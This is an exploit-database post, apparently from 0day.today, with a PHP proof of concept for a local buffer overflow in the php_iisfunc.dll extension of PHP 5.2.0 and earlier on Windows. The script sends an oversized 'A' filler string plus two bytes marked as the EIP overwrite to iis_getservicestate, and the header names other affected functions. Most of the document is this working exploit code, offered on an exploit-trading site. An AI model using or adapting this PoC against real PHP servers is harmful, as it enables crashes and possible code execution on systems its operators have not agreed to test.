PHP <= 5.2.0 (php_iisfunc.dll) Local Buffer Overflow PoC (win32)

πŸ—“οΈΒ 27 Aug 2007Β 00:00:00Reported byΒ boeckeTypeΒ 
zdt
Β zdt
πŸ”—Β 0day.todayπŸ‘Β 13Β Views

php_iisfunc.dll Buffer Overflow PoC PHP 5.2.0 (win32

================================================================
PHP <= 5.2.0 (php_iisfunc.dll) Local Buffer Overflow PoC (win32)
================================================================




<?php
// ==================================================================================
//
//  php_iisfunc.dll PHP <= 5.2.0 (win32) Buffer Overflow PoC
//
//      Discovery: boecke <[email protected]>
//      Risk: Local Buffer Overflow (Medium - High Risk)
//      Notes: Various other functions are exploitable, all of which convert the
//      string argument(s) to unicode.
//
//      extern "C" IISFUNC_API int fnStartService(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnGetServiceState(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnStopService(LPCTSTR ServiceId);
//
//      "Sangre, sonando, de rabia naci.. Who do you trust?"
//       - Cygnus, Vismund Cygnus: Sarcophagi
//
// ==================================================================================

if ( !extension_loaded( "iisfunc" ) )
{
       die( "Extension not loaded.\n" );
}

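// 256-character filler string used as the service ID argument.
$buf_unicode = str_repeat( "A", 256 );
// Two further bytes appended past the filler; the variable name refers to EIP.
$eip_unicode = "\x41\x41";

// The oversized string is handed to the extension, which (per the notes above)
// converts its string argument to Unicode.
iis_getservicestate( $buf_unicode . $eip_unicode );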

?>



#  0day.today [2018-04-08]  #
